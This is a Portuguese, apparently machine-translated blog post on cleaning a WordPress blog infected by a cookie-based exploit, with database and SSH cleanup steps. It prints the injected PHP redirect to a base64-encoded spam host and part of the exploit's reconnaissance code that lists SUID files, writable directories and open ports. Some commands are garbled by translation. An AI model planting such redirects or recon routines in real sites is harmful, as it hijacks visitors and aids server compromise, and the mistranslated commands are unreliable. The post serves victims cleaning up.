No último mês, continuei recebendo avisos de vírus no blog de alguns visitantes. Inicialmente, ignorei os avisos porque tinha um antivírus bastante bom instalado (Kaspersky AV 2009) e embora tenha passado muito tempo no blog, nunca recebi o alerta de vírus (.. há um tempo vi algo suspeito, que desapareceu na primeira atualização. finalmente...).
Lentamente, lentamente, grandes variações começaram a aparecer tráfego de visitantes, depois do que ultimamente o tráfego diminuiu constantemente e começou a haver cada vez mais pessoas que me dizem isso StealthSettings.com isso é Virusat. Ontem recebi de alguém uma captura de tela tirada quando o antivírus bloqueou uma script de stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Foi suficientemente convincente para mim, que comecei a procurá-lo em todas as fontes. A primeira ideia que me veio à cabeça foi fazer atualizar para a versão mais recente do WordPress (2.5.1), mas não antes de excluir todos os arquivos de script antigos do WordPress e fazer backup de banco de dados. Este procedimento não deu nenhum resultado e provavelmente teria demorado muito para descobrir onde estava o bug, se ele não tivesse me contado Eugênio em uma discussão durante o café, que ele descobriu um link no Google e seria bom ver isso.
MyDigitalLife.info, publicou um artigo com o título: "Hack de WordPress: recupere e corrija o Google e o mecanismo de pesquisa ou nenhum tráfego de cookies redirecionado para Your-Needs.info, AnyResults.Net, Golden-Info.net e outros sites ilegais”, que é o fim do tópico que eu precisava.
É sobre um explorar por WordPress baseado em cookies, que na minha opinião é muito complexo e feito conforme o livro. Inteligente o suficiente para fazer um Injeção SQL no banco de dados do blog, Assim, para criar um usuário invisível a uma simples verificação de rotina de Painel->Usuários, Assim, para verificar os diretórios e arquivos "graváveis" no servidor (que possuem chmod 777), para pesquisar e executar arquivos com privilégios de grupo ou até mesmo de root. Não sei o nome da exploração e vejo que existem poucos artigos escritos sobre ela, apesar de existirem muitos blogs infectados, inclusive da Romênia. Ok... vou tentar explicar generalidades sobre esse vírus.
O que o vírus faz?
Em primeiro lugar, insere nas fontes das páginas dos blogs, links invisíveis para os visitantes, mas visíveis e indexáveis para os motores de busca, especialmente o Google. Desta maneira transferir o Page Rank para sites indicados pelo invasor. Em segundo lugar, é inserido mais um código de redirecionamento URL, para visitantes que vêm do Google, Live, Yahoo, ... ou de um leitor RSS e não possuem o site em biscoito. E antivírus detecta esse redirecionamento como Trojan-Clicker.HTML.
Sintomas:
A queda massiva no tráfego de visitantes, especialmente em blogs onde a maioria dos visitantes vem do Google.
Identificar: (é aí que o problema fica complicado para quem não entende muito de phpmyadmin, php e linux)
O. CUIDADOSO!!! PRIMEIRO FAÇA UM BACKUP DO BANCO DE DADOS!!!
1. Verifique as fontes dos arquivos index.php, Assim, cabeçalho.php, Assim, rodapé.php, do tópico do blog e veja se existe um código que usa criptografia base64 ou contém "if($ser=="1? && sizeof($_COOKIE)==0)” no formato:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>...ou algo semelhante. Exclua este código!
Clique e imagine…
Na captura de tela acima, selecionei por engano "<?php get_header(); ?>Esse código deve permanecer.
2. Uso phpmyadmin e vá para a tabela no banco de dados wp_users, onde você verifica se existe um usuário sem nome, criado em 00:00:00 0000-00-00 (é possível no campo usuário_login escreva "WordPress". Anote o ID deste usuário (campo ID) e exclua-o.
Clique e imagine…
*aquele que está na linha verde, seu ID deve ser excluído e mantido. No caso dele com sono, era ID = 8 .
3. Vá para a mesa wp_usermeta, onde você tem que localizado você é EXCLUIR as linhas relacionadas ao ID (onde no campo ID do usuário o valor do ID excluído aparece).
4. Na mesa opção wp_, entre plugins_ativos e veja qual plugin está ativado de forma suspeita. Pode usar finais como _old.giff, _old.pngg, _old.jpeg, _new.php.giff, etc. combinações de extensões de imagem falsas com _old e _new.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'Exclua este plugin e vá para o blog –> Painel -> Plugins, onde você desativa e ativa um determinado plugin.
Clique na imagem para ver como o arquivo infectado aparece em active_plugins.
Siga o caminho FTP ou SSH indicado em active_plugins e exclua o arquivo do servidor.
5. Também no phpMyAdmin, na tabela opção wp_, encontre e exclua a linha que contém "rss_f541b3abd05e7962fcab37737f40fad8"e vire"links_internos_cache”.
Em internal_links_cache, os links de spam que aparecem no blog e um Código do Google Adsense, do hacker.
6. É recomendado que você alterar a senha de entrar no blog e assim remova todos os usuários suspeitos. Atualize para a versão mais recente do WordPress e configure o blog para não permitir mais o cadastro de novos usuários. Não há perda... mesmo quem não está logado pode comentar.
Tentei explicar acima o quanto, o que fazer em tal situação, para limpar o blog desse vírus. O problema é muito mais grave do que parece e não está longe de ser resolvido, porque são utilizados vulnerabilidades de segurança do servidor de hospedagem onde está o blog.
Como primeira medida de segurança, quem tem acesso Ssh, para fazer algumas verificações no servidor para ver se ainda existem arquivos como *_old* e *_new.* com as terminações .gif, .jpeg, .pngg, .jpgg. Esses arquivos devem ser excluídos. Se renomearmos um arquivo, por ex. top_right_old.giff em top_right_old.php, vemos que o arquivo contém exatamente o código de exploração do servidor.
Algumas dicas úteis para verificar, limpar e proteger o servidor. (via SSH)
1. cd/tmp e verifique se existem tais pastas tmpVFlma ou outras combinações de nomes semelhantes e exclua-o. Você pode ver na imagem abaixo duas dessas pastas para mim:
rm –rf pasta numérica
2. Verifique e elimine (altere o chmod) tanto quanto possível as pastas com atributos chmod 777
encontre todos os arquivos graváveis no diretório atual: encontrar . -tipo f -perm -2 -ls
encontre todos os diretórios graváveis no diretório atual: encontrar . -tipo d -perm -2 -ls
encontre todos os diretórios e arquivos graváveis no diretório atual: encontrar . -perm -2 –ls
3. Procure arquivos suspeitos no servidor.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4, CUIDADOSO!!! para os arquivos que definem o bit SUL e Patim. Esses arquivos são executados com os privilégios do usuário (grupo) ou root, não com os do usuário que executa o arquivo. Esses arquivos podem comprometer o root se houver problemas de segurança. Se você não usa arquivos com bits SUID e SGID, execute “chmod 0” neles ou desinstale o pacote que os contém.
A exploração contém algum lugar na fonte...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}...praticamente desta forma ele encontra falhas de segurança. Portas abertas, diretórios "graváveis" e execução de arquivos com privilégios de grupo/root.
Voltarei com detalhes...
Alguns blogs infectados: www.blegoo.com, www.visurat.ro,
fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiologia.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/blog, blog.einvest.ro
... e a lista pode continuar... muito.
Você pode verificar se um blog está infectado usando o mecanismo de busca Google. cópia & colar:
site: www.blegoo.com comprar
Boa noite e bom trabalho ;) Em breve acho que o Eugen virá com novidades, no prevezibil.imprevizibil.com.
brb :)
EM: ATENÇÃO! Alterar o tema do WordPress ou atualizar para o WordPress 2.5.1 NÃO é uma solução para se livrar deste vírus.
